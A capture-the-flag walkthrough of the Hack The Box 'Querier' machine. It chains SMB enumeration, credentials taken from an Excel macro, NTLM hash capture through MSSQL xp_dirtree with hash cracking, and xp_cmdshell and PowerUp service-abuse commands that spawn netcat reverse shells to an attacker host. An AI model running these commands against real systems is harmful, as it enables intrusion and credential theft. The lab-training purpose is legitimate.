We start off by quickly scanning all ports using nmap -p- once this has finished we can take the found ports (ignoring the RCP ports) and scan them more intensively to get the following results:

nmap -p-


135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

nmap -p 135,139,445,1433,5985,47001  -A -T4


135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-10-11T09:14:54
|_Not valid after:  2050-10-11T09:14:54
|_ssl-date: 2020-10-11T09:40:25+00:00; +23s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 22s, deviation: 0s, median: 22s
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-11T09:40:21
|_  start_date: N/A


We start off by checking the SMB ports using smbclient. We are able to connect using the -N switch to specify no password. We can view the remote shares with smbclient -L -N.

After finding the reports share we can attempt to connect directly to it with the following command smbclient \\\\\\Reports -N

From here we can grab the .xlsm file in the share using the get command.

XLSM is a macro enabled XLSX workbook that use XML and ZIP to store information. We can use binwalk with the -e switch to extract the file to a folder.

We can run the strings command on the vbaProject.bin file to obtain the following information where Uid and Pwd appear to be credentials.

We can also view the macro in LibreOffice Calc to obtain the same information.

We have obtained the following credentials:

  • Username = reporting

  • Password = PcwTWTHRwryjc$c6

We can then use Impacket's mssqlclient.py to connect to the SQL server on port 1433 with the credentials we have found. Before we do so we need to edit our hosts file so we can authenticate to MSSQL.

Add the box domain name to the hosts file in /etc/hosts

After this has been completed we can then navigate to the directory where mssqlclient.py is installed and run the python script using the following syntax:

python mssqlclient.py  querier/reporting:'PcwTWTHRwryjc$c6'@ -windows-auth

the $ symbol in the password is not interpreted properly and we will need to encapsulate the password in single quotation marks to send it "as is" for the password to authenticate correctly.

From here the first thing to try would be the command xp_cmdshell to see if we can grab shell. In this instance access was denied so we need to log on elsewhere to proceed. What we can do is to try and capture an NTLM hash by getting the remote machine user account to authenticate against a SMB server on our attacking machine.

When the victim machine sends its request we can capture the NTLM hash and attempt to crack it offline with Hashcat or John the Ripper.

To start this process we need to start a SMB server on our attacking machine. Impacket has a script for this called smbserver.py

python3 smbserver.py -smb2support <sharename> <sharepath>

From here we can run the EXEC xp_dirtree command on the victim machine to attempt to connect back to our attacking machine and we can capture the NTLMv2 hash.

The above command was taken from this Medium article which I highly recommend reading regarding this.

We can see on Kali we have caught the NTLMv2 hash.

We can save the NTLMv2 hash to file and attempt to crack with John The Ripper. If you are having issues with the NTLMv2 hash not loading in John or Hashcat you may be using the latest version of Impacket which was causing me this issue. I reached out for help on TCM's Discord channel and was advised to use Impacket 0.9.19 (I was using 0.9.21).

I was able to easily uninstall Impacket and reinstall with 0.9.21 using Dewalt's pimpmykali python script found here:

After this I was able to grab the NTLMv2 hash again and was able to successfully load it into John.

From here we can run this hash against John with the rockyou.txt word list.

We now have the password "corporate568". We can log into the MSSQL server again as we did above, however this time we can log in with the mssql-svc account which we obtained from the NTLMv2 hash.

mssqlclient.py  querier/mssql-svc:'corporate568'@ -windows-auth 

Running the help command we get the following output:

What we want is the xp_cmdshell. We first need to enable it with the enable_xp_cmdshell command to make it usable.

After this we can effectively execute cmd commands. We would ideally take advantage of this so we can try to gain a reverse shell to make our usage much easier. I initially tried hosting netcat on the attacking machine with python and could not get a call back using Powershell Invoke-Webrequest or certutil.exe.

Instead I decided on using the smbserver.py script we used earlier. Doing this I can host the nc.exe file in the SMB share and execute it from the MSSQL server.

Move nc.exe to a preferred directory. For ease of use I moved nc.exe into the same directory in which I have smbclient.py located. Once completed run the following command to start up the SMB server again.

sudo python smbserver.py -smb2support <sharename> ./

Once completed start a netcat listener on the attacking machine using nc -lvp 4444.

We can now execute the following command on the MSSQL server:

xp_cmdshell \\<IP>\shared\nc.exe -e cmd.exe <IP> 4444

We now have a reverse shell.

We can now grab the user.txt flag before moving onto Privilege escalation.

Privilege Escalation

I started off by doing basic enumeration and found with whoami /priv that we have the SeImpersonate privilege however, as we are on a Windows 2019 Server machine I was unable to execute the exploit. With anything older than Server 2019 this is usually an easy win.

I uploaded powerup.ps1 to the SMB server and then copied this down into the Reporting directory at C:\Reporting since we have write and execute permissions in this folder.

Powerup also picks up the SeImpersonate token when running the Invoke-AllChecks module. What we are interested in is the service 'UsoSvc' By default running the recommended AbuseFunction as listed below will add a new local administrator account for us.

Instead of this we will use the AbuseFunction to create a netcat reverse shell instead. We can use the following command:

Invoke-ServiceAbuse -Name 'UsoSvc' -command "\\shared\nc.exe -e cmd.exe 6666"

Once again calling the nc.exe in our SMB server we hosted earlier. Just make sure you start a netcat listener on the attacking machine first. If done correctly this should call back a as NT Authority\System

From here we can grab the root.txt flag.

Last updated